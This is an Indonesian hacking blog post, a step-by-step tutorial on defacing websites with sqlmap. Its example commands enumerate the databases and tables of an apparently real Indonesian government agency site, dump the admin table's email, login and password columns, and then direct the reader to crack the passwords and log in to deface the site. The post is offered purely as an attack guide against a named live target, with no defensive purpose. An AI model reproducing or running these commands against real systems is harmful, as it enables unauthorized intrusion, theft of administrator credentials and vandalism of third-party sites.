MASIGNCLEAN101

Home › deface › tutorial › Tutorial Deface Menggunakan SQLMAP Terbaru 2019

Tutorial Deface Menggunakan SQLMAP Terbaru 2019

Jiwa Tersesat
Saturday, July 27, 2019

Selamat pagi/siang/sore/malem om, sis. Kali ini ane mau posting tentang deface, Yup cara deface dengan SQLMAP di Windows, oke langsung simak aja tutorial nya.

Alat perang :
- SQLMAP
- Python
- Google Dork
Yang pertama, ente install dulu Python nya, lalu taro file SQLMAP nya di C:/sqlmap
Buka cmd, ente pergi ke direktori SQLMAP yang ada di C:/sqlmap tadi, dengan perintah > cd c:/sqlmap

Lalu ketikkan perintah > sqlmap.py untuk menjalankan SQLMAP
Perintah ini untuk melihat isi database > sqlmap.py -u http://target.com --dbs
contoh :> sqlmap.py -u http://rosy.pom.go.id/bpom-notifikasi/news.php?id=1 --dbs

Nahh, ada 2 database di situs http://rosy.pom.go.id/

Ane pilih database notifikasi, masukkan perintah > sqlmap.py -u http://target.com -D nama_db --tables
contoh :> sqlmap.py -u http://rosy.pom.go.id/bpom-notifikasi/news.php?id=1 -D notifikasi --tables

Ada 145 Tabel di dalam database notifikasi,

Sekarang ente cari Tabel admin/user/auth/login atau yang lain, yang berhubungan dengan administrator.
contoh : bpom_user

ketikkan perintah > sqlmap.py -u http://target.com -D nama_db -T nama_tabel --column untuk melihat isi dari tabel.
contoh :> sqlmap.py -u http://rosy.pom.go.id/bpom-notifikasi/news.php?id=1 -D notifikasi -T bpom_user --column

Sekarang ente pilih field/kolom yang berisi data pending dari admin, seperti username,password,login,email,dll.

Ketikkan perintah > sqlmap.py -u http://target.com -D nama_db -T nama_tabel -C kolom1,kolom2,kolom2,dst --dump untuk melihat isi dari kolom tersebut.
contoh :> sqlmap.py -u http://rosy.pom.go.id/bpom-notifikasi/news.php?id=1 -D notifikasi -T bpom_user -C email,login,password,uploaded --dump

Nahh udah dapet kan data nya? sekarang tinggal crack/decrypt passwordnya dan cari tempat loginnya.
Baca juga : Cara Mencari Admin Login Page Dengan Script Perl

Oke, sekian dulu tutorial hari ini. Semoga dapat menambah ilmu sobat, terimakasih sudah berkunjung :)

Share This :

Jiwa Tersesat

Newbie

Syarat & Ketentuan Berkomentar

1. Jangan cantukan link mati maupun hidup
2. Gunakan bahasa yang dapat dimengerti
3. Jangan spam link
4. Koment yang relevan sesuai dengan topik yang di bahas
5. Jangan copy psate artikel, jika ingin dihargai maka hargailah orang

Emoticon Feedback

Subscribe to: Post Comments (Atom)